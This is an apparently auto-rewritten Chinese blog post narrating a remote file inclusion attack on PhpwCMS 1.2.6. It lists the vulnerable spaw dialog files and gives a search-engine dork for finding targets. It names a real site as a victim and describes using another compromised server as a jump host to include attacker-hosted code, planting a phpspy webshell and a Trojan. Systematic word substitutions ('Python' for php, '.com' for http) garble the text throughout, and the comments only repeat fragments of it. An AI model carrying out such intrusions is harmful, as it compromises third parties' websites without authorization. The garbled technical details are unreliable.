骇客如何利用文件包含漏洞进行网站入侵
一、看到系统漏洞公示最近想学习一下文件包括系统漏洞,在不经意中看见关于文件包括的系统漏洞公示。大致的意思是这样的,PhpwCMS 1.2.6系统的以下文件存在文件包括系统漏洞:include/inc_ext/spaw/dialogs/list.phpinclude/inc_ext/spaw/dialogs/a.phpinclude/inc_ext/spaw/dialogs/colorpicker.phpinclude/inc_ext/spaw/dialogs/confirm.phpinclude/inc_ext/spaw/dialogs/img.phpinclude/inc_ext/spaw/dialogs/img_library.phpinclude/inc_ext/spaw/dialogs/td.Python文件中的$spaw_root的没有过虑的情况下,包括'**class/lang.class.Python'。具体的编码公示中没送出来。可以利用下面的网页地址利用此系统漏洞,.com://website1/include/inc_ext/spaw/dialogs/list.Python?spaw_root=.com://website2/,其中website1是有系统漏洞的网站,website2是进攻的网站,website2所属的文件目录外有class/lang.class.Python文件。
二、学习的第一日立刻行动,我用google搜索inurl:"phpwcms/index.Python?Id=",搜索到38,800多选结果,基本上都是国外的。看来此次发了,此次国外的wenshell肯定是一堆了。呵呵呵……,哈哈哈……随意点击个网站,是美国的:.com://arena-sv.jans-webdesign.Com,不知道这个网站有没有系统漏洞。我用.com://arena-sv.jans-webdesign.Com/phpwcms/include/inc_ext/spaw/dialogs/list.Python?spaw_root=.com://WWW.baidu.Com/检测,当然.com://WWW.baidu.Com/class/lang.class.Python是不存在的,这时候页面显示如图所示一如图,提示没有找到页面。这说明了这个网站存在文件包括系统漏洞,象这样的有系统漏洞的网站随意点击一个就是。
检测出有文件包括系统漏洞开始利用这个系统漏洞,在我的支持asp网站主目录建一个class的文件目录,在class里面建lang.class.Python文件。但是当你用电脑浏览器预览.com://WWW.xxxx.xX/class/lang.class.Python的时候,提示找不着文件。难道说是我的网站所属的网络服务器没设置好么?我试着找到几个webshell,预览的时候还是出现找不着文件的问题。
烦闷啊……如果可建一个txt文件替代class/lang.class.Python 多好啊。我说了我们工作组的学linux的同学们,有人说可以用问号优化。但是偶不会啊,听上来很复杂的,等明天再说做吧,歇息,歇息。
三、学习的隔天去搜索的发现有系统漏洞的网站变得比较少了,绝大多数的网站都被系统漏洞补了,还有一部分美国的网站上被挂掉一些与反战事有关的图片或者一些五星红旗。还行的是昨日的哪个网站没有被别人黑掉,有机会学习。我还在不经意中得到了jsp的wenshell,试着写了一个Python文件,在电脑浏览器预览的时候出现的是原文件。看来现在现在可以利用这个jsp的webshell当作跳板。
在webshell里面建一个class的文件夹名称,随后在class文件目录里面发送一个lang.class.Python空文件,在文件里面写上.在电脑浏览器上预览.com://___/gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/class/lang.class.Python, 显示的就是, 随后提交.com://arena-sv.jans-webdesign.Com/phpwcms/include/inc_ext/spaw/dialogs/list.Python?spaw_root=.com://___/gate/download.jsp?file=%2Fopt%2Foracle%2Fproduct%2F10gbi%2Fj2ee%2Fgate%2Fapplications%2Fgate%2Fgate%2Fgate%2F,%2F是/的含意。
Python环境信息编写lang.class.Python的文件,先写了一个phpspy。但是登录webshell的后,页面转至其他的页面。还是先传一可以发送的文件的马儿吧,传了一个国外的Python木马病毒,木马病毒的功能很的大,
相关文章
- 4条评论
- 柔侣走野2022-06-04 19:15:03
- nclude/inc_ext/spaw/dialogs/img_library.phpinclude/inc_ext/spaw/dialogs/td.Python文件中的$spaw_root的没有过虑的情况下,包括'**class/lang.class.Python
- 孤央宠臣2022-06-04 23:48:04
- logs/list.phpinclude/inc_ext/spaw/dialogs/a.phpinclude/inc_ext/spaw/dialogs/colorpicker.phpinclude/inc_ext/spaw/
- 囤梦眼趣2022-06-04 16:53:22
- 称,随后在class文件目录里面发送一个lang.class.Python空文件,在文件里面写上.在电脑浏览器上预览.com://___/gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/ga
- 世味馥妴2022-06-04 12:28:40
- ext/spaw/dialogs/img.phpinclude/inc_ext/spaw/dialogs/img_library.phpinclude/inc_ext/s